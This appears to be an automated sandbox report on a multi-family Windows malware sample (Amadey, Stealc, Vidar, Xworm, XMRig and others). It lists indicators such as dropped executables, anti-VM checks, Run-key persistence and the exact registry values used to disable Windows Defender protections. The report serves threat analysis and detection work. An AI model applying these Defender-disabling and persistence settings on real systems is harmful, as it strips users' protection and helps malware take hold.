Malware Analysis Report

2025-04-03 09:24

Sample ID 250305-23m6dsslz4
Target 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f
SHA256 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f
Tags
amadey gcleaner healer litehttp stealc systembc xworm 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan vidar xmrig ir7am credential_access miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f

Threat Level: Known bad

The file 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer litehttp stealc systembc xworm 092155 trump bot defense_evasion discovery dropper evasion execution loader persistence rat spyware stealer trojan vidar xmrig ir7am credential_access miner

Xworm family

Stealc family

Systembc family

Healer family

LiteHTTP

Healer

Modifies Windows Defender TamperProtection settings

SystemBC

Detects Healer an antivirus disabler dropper

Amadey family

xmrig

Gcleaner family

Litehttp family

Amadey

Modifies Windows Defender DisableAntiSpyware settings

Vidar family

Modifies Windows Defender Real-time Protection settings

Stealc

Detect Xworm Payload

Vidar

Modifies Windows Defender notification settings

Xmrig family

Xworm

Detect Vidar Stealer

GCleaner

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Blocklisted process makes network request

.NET Reactor proctector

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of local email clients

Identifies Wine through registry keys

Windows security modification

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Windows directory

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Program crash

Enumerates physical storage devices

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Delays execution with timeout.exe

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-05 23:06

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 23:06

Reported

2025-03-05 23:09

Platform

win7-20240903-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\sugkcx\gvnsf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\sugkcx\gvnsf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\sugkcx\gvnsf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
N/A N/A C:\ProgramData\sugkcx\gvnsf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2212_133856897364813000\chromium.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\ProgramData\sugkcx\gvnsf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd0ae9eb0c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\cd0ae9eb0c.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\51a7d2c853.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\51a7d2c853.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\65ac27f01e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\65ac27f01e.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef30a65d57.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\ef30a65d57.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6410dd2f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\e6410dd2f6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ipzvs8T3\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE N/A
